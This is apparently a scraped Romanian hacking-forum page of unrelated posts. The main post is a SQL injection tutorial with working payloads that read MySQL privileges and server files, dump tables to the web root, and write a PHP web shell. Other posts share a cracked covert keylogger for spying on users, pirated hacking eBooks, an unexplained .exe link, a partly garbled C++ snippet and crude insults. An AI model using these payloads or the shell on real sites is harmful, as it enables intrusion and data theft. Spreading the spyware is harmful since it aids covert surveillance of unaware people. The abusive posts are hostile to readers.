Leaderboard

*** Hackers Black Book *** Type/Genre..: eBook Format......: PDF Size........: 4-MB LANGUAGE....: English Books : Hacking Into Computer Systems Maximum Security: A Hacker's Guide to Protecting Your Internet site and network Hackers Survival Guide How to Make Key Generators Tricks Of The Internet Gurus Hacking for Dummies 2 http://www.multiupload.com/42S6A8VNJX

Paper about: INTO OUTFILE (Mysql) The FILE privilege If we want to read or write to files we have to have the FILE privilege. First see wich user we are in db with code: 0? UNION SELECT current_user,null /* you can put current_user or user() or system_user This will give us the username@server. //(normally ..@localhost) You can also use the following blind SQL injections query, but it's very booring.. : Guess a name: 1? AND user() LIKE ‘root Brute the name letter by letter: 1? AND MID((user()),1,1)>’m 1? AND MID((user()),2,1)>’m 1? AND MID((user()),3,1)>’m ecc... Now we must acces to mysql.user so.. 0? UNION SELECT 1,2,3,file_priv,4 FROM mysql.user WHERE user = ‘username for username we put the name of current_user. You can also have a look at the whole mysql.user table without the WHERE clause, but I chose this way because you can easily adapt the injection for blind SQL injection: 1? AND MID((SELECT file_priv FROM mysql.user WHERE user = ‘username’),1,1) = ‘Y Naturally, this it's a blind so yuo can't write 1,2,3.. becouse it's not a union select. (but it's subselects ) You can also recieve the FILE privilege info from the information.schema table on MySQL 5: 0? UNION SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username% Like IN blind sqli: 1? AND MID((SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username%’),1,1)=’Y The Web Directory Problem Once we know if we can read/write files we have to check out the right path. In the most cases the MySQL server is running on the same machine as the webserver does and to access our files later we want to write them onto the web directory. If you define no path, INTO OUTFILE will write into the database directory. On MySQL 4 we can get an error message displaying the datadir: 0? UNION SELECT load_file(’a'),null/* On MySQL 5 we use: 0? UNION SELECT @@datadir,null/* The default path for file writing then is datadir\databasename. You can figure out the databasename with: 0? UNION SELECT database(),null/* Now these information are hard to get with blind SQL injection. But you don’t need them necessarily. Just make sure you find out the web directory and use some ../ to jump back from the datadir. If you are lucky the script uses mysql_result(), mysql_free_result(), mysql_fetch_row() or similar functions and displays warning messages. Then you can easily find out the webserver directory by leaving those functions with no input that they will throw a warning message like: Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /web/server/path/file.php on line xxx To provoke an error like this try something like: 0? AND 1=’0 or add some like param[]=1 This works at the most websites. If you’re not lucky you have to guess the web directory or try to use load_file() to fetch files on the server which might help you. Here is a new list of possible locations for the Apache configuration file, which may spoil the webdirectory path: /etc/init.d/apache /etc/init.d/apache2 /etc/httpd/httpd.conf /etc/apache/apache.conf /etc/apache/httpd.conf /etc/apache2/apache2.conf /etc/apache2/httpd.conf /usr/local/apache2/conf/httpd.conf /usr/local/apache/conf/httpd.conf /opt/apache/conf/httpd.conf /home/apache/httpd.conf /home/apache/conf/httpd.conf /etc/apache2/sites-available/default /etc/apache2/vhosts.d/default_vhost.include Check out the webservers name first by reading the header info and then figure out where it usually stores its configuration files. This also depends on the OS type (*nix/win) so you may want to check that out too. Use @@version or version() to find that out: 0? UNION SELECT @@version,null /* -nt-log at the end means it’s a windows box, -log only means it’s *nix box. Or take a look at the paths in error messages or at the header. Typical web directories to guess could be: /var/www/root/ /var/www/dbname/path/ /var/www/sitename/htdocs/ /var/www/localhost/htdocs Basically you should be allowed to write into any directory where the MySQL server has write access to, as long as you have the FILE privilege. However, an Administrator can limit the path for public write access. Create Useful Files Once you figured out the right directory you can select data and write it into a file with: 0? UNION SELECT columnname,null FROM tablename INTO OUTFILE ‘../../web/path/file.txt ( sometimes from mysql.user ) Or the whole data without knowing the table/column names: 1? OR 1=1 INTO OUTFILE ‘../../web/path/file.txt If you want to avoid splitting chars between the data, use INTO DUMPFILE instead of INTO OUTFILE. You can also combine load_file() with into outfile, like putting a copy of a file to the accessable webspace: 0? AND 1=0 UNION SELECT load_file(’…’) INTO OUTFILE ‘… In some cases I’d recommend to use 0? AND 1=0 UNION SELECT hex(load_file(’…’)) INTO OUTFILE ‘… and decrypt it later with the PHP Charset Encoder, especially when reading the MySQL data files. Or you can write whatever you want into a file: 0? AND 1=0 UNION SELECT ‘code’,null INTO OUTFILE ‘../../web/server/dir/file.php Here are some useful code examples: A Normal code for a shell (PHP): <? system($_GET['lol']); ?> It's very important that the PHP safe_mode must be turned off!!. If is turned on maybe we can bypass symple with a hex converter: We can convert the code for bypass MAGIC_QUOTES_GPC filter. (normally yuo cans ee if hex_mode work with a load_file(pathinhex), like load_file(0x2f6574632f706173737764) for /etc/password (<= usually path) We can see a lot of informations about the webserver configuration with: <? phpinfo(); ?> // SQL QUERY <? ... $result = mysql_query($_GET['query']); ... ?> Try to use load_file() to get the database connection credentials, or try to include an existing file on the webserver which handles the mysql connect. REmember that the quotes are required and so if the error are like: error db near '\/www/root/path/page.php'\ maybe it's becouse the quotes are not allowed (with special filter used for anti-xss) Credits Goes To:xaDoS & Johannes Dahse

imi lipseste sa port o discutie inteligenta cu o femeie, pizda gasesc angro de la proaste ca tine, tre doar sa le scot la un suc, pentru un suc o si sug se si fut

Nu era lent, doar avea buguri. Evita sa mai compari inturi cu floaturi sau sa rescrii functii care sunt deja in standard. #include<iostream> #include<math.h> using namespace std; double li=1,ls; int curs=1; //cursor pentru a putea lucra cu 10^-k void sqrt(int n,float a,int prec){ double zec,i; do{ zec=1.0/curs; //stabilim zecimala la care lucram for(i=li; ;i+=zec) //cautam { //cout<<"Acum sunt la "<<pow(i,n)<<a<<pow(i+zec,n)<<endl; if(pow(i,n)<=a && a<=pow(i+zec,n)){ //am gasit /* Actualizam, sloboz */ li=i; ls=i+zec; /* Actualizam, sloboz */ curs*=10; //are valori doar puteri ale lui 10 (pentru a calcula 10^-k, duh! ) prec--; break; //ciclul nu mai are rost, am gasit zecimala, ne-am facut treaba, la revedere } } }while(prec>=0); //folosesc variabila prec pe post de cursor, sa stiu la a cata zecimala sa ma opresc } int main(){ int n,prec;float a; cout<<"Bun venit la emisiunea \" Calculeaza radical de ordin n din a, cu o prezicie de x zecimale !\" Have fun \n"; cout<<"a=";cin>>a; cout<<"n=";cin>>n; cout<<"x="; cin>>prec; sqrt(n,a,prec); cout<<li<<" < "<<"Radical de ordinul "<<n<<" din "<<a<<" < "<<ls<<endl;; return 0; } Ca sa intelegi unde greseai ruleaza codul asta #include <stdio.h> int main() { double a = 0.6; double b = 2025.0; printf("a * b = %f\n", a * ; printf("a * b = (int) %d\n", (int) (a * ); return 0; } Surprinzator. Nu?

Inca imi mention pozitia ca merge mult mai rapid (i.e. sirul converge rapid). In plus nu e ca si cum nth root nu se poate deduce din algoritmul pentru square root. E destul de straight forward.

trebuie sa cauti pe google un fisier ... dar eu tot nu m-am prins ce face Razvan instaleaza asta si va merge : http://www.ascentive.com/support/new/libraryfiles.exe

sa te loveasca un asteroid, pe tine, pe mata si pe tot neamu tau de maimute

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun. This is a major upgrade with numerous new features, including: -The ability to compare site maps -Functions to help with testing access controls using your browser -Support for preset request macros -Session handling rules to help you work with difficult situations -In-browser rendering of responses from all Burp tools -Auto recognition and rendering of character sets -Support for upstream SOCKS proxies -Headless mode for unattended scripted usage -Support for more types of redirection -Support for NTLMv2 and IPv6 -Numerous enhancements to Burp's extensibility -Greater stability on OSX Download: Download Burp Suite

Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited. This invisible spy application is designed for 2000, XP, 2003, Vista and Windows 7. Keylogger Features: * Email log delivery - keylogger can send you recorded logs through e-mail delivery at set times - perfect for remote monitoring! * FTP delivery - Ardamax Keylogger can upload recorded logs through FTP delivery. * Network delivery - sends recorded logs through via LAN. * Clipboard logging - capture all text copied to the Windows Clipboard. * Invisible mode makes it absolutely invisible to anyone. Ardamax Keylogger is not visible in the task bar, system tray, Windows 2000/XP/2003/Vista/Windows 7 Task Manager, process viewers (Process Explorer, WinTasks etc.), Start Menu and Windows Startup list. * Visual surveillance - periodically makes screenshots and stores the compressed images to log. * Chat monitoring - Ardamax Keylogger is designed to record and monitor both sides of a conversation in following chats: o AIM o Windows Live Messenger 2011 o ICQ 7 o Skype 4 o Yahoo Messenger 10 o Google Talk o Miranda o QiP 2010 * Security - allows you to protect program settings, Hidden Mode and Log file. * Application monitoring - keylogger will record the application that was in use that received the keystroke! * Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke! * Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer. * Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher. * Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets. * It records every keystroke. Captures passwords and all other invisible text. Other Features: * Windows 2000/2003/XP/Vista/Windows 7 support * Monitors multi-user machines * Automatic startup * Friendly interface * Easy to install Enjoy;) Download: http://www.filesonic.com/file/77948562/Ardamax_Keylogger_v3.5.3_+_Serial_[Only_Here].rar L-am cumparat de curand si am zis sa il impart si cu voi Bucurati-va http://www.virustotal.com/file-scan/report.html?id=820255ca92ded7b0e31536ea59731143ded7a7de8fbf893861dc2793c666c3df-1297258343